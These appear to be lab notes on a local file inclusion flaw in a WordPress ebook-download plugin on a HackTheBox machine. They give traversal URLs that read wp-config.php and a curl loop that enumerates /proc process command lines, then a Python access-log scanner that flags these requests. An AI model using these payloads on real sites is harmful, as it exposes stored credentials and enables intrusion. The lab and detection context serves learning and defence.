LFI

General info

An LFI can look like this: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

Sometimes the repeated ‘../../../’ can be replaced with //, e.g.:

http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=//wp-config.php

This looks cleaner and is shorter.

In this case, the LFI can also be used to list all running processes by reading the /proc filesystem. However, because the LFI returns the “entire” PHP code of a file as-is instead of executing it, we won’t be able to execute any code.

Get the list of running processes

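# Request /proc/<pid>/cmdline for PIDs 0 to 2000 and log each response next to its PID (-s hides curl's progress meter)
for i in $(seq 0 2000); do echo -n "$i: "; curl -s "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=//proc/$i/cmdline" --output -; echo; done | tee pid.lst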

We write the response for each PID from 0 to 2000 into pid.lst.
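
Seen from the server side, the requests above leave a recognisable trail in the web access log. The following added example (not part of the original notes) scans combined-format log lines for the ebookdownloadurl parameter and flags traversal sequences, absolute paths and /proc reads, plus any client that walks several PIDs. The log lines, IP addresses, the benign ebooks/guide.pdf path and the threshold of 3 are constructed assumptions, as is the premise that legitimate values are relative paths.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

PARAM = "ebookdownloadurl"   # parameter name from the URLs on this page
ENUM_THRESHOLD = 3           # assumed: distinct /proc PIDs per client before flagging
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3}')
PROC_RE = re.compile(r"^/+proc/(\d+|self)/")
EP = "/wp-content/plugins/ebook-download/filedownload.php?" + PARAM + "="

def sample_line(ip, value):  # builds one constructed access-log line, not real traffic
    return f'{ip} - - [01/Jan/2022:10:00:00 +0000] "GET {EP}{value} HTTP/1.1" 200 512'

SAMPLE_LOG = "\n".join([
    sample_line("10.10.14.5", "../../../wp-config.php"),
    sample_line("10.10.14.5", "//wp-config.php"),
    *[sample_line("10.10.14.5", f"//proc/{pid}/cmdline") for pid in (1, 2, 3)],
    sample_line("192.0.2.11", "..%252f..%252fwp-config.php"),   # double-encoded traversal
    sample_line("192.0.2.10", "ebooks/guide.pdf"),              # benign (assumed) download
])

def classify(value):
    """Return (reasons, pid): why a value looks like a file read, and any /proc PID."""
    for _ in range(3):                       # peel nested URL-encoding
        value = unquote(value)
    path = value.replace("\\", "/")
    proc = PROC_RE.match(path)
    reasons = []
    if ".." in path.split("/"):
        reasons.append("traversal")
    if path.startswith("/"):
        reasons.append("absolute-path")
    if proc:
        reasons.append("procfs")
    pid = int(proc.group(1)) if proc and proc.group(1).isdigit() else None
    return reasons, pid

def scan(log_text):
    """Return (findings, enumerators): flagged requests and IPs walking /proc PIDs."""
    findings, pids = [], defaultdict(set)
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        ip, target = m.groups()
        for value in parse_qs(urlsplit(target).query).get(PARAM, []):
            reasons, pid = classify(value)
            if reasons:
                findings.append((ip, value, reasons))
            if pid is not None:
                pids[ip].add(pid)
    return findings, {ip for ip, seen in pids.items() if len(seen) >= ENUM_THRESHOLD}
```

Calling scan(SAMPLE_LOG) returns the flagged requests and the set of clients that requested at least ENUM_THRESHOLD distinct /proc PIDs.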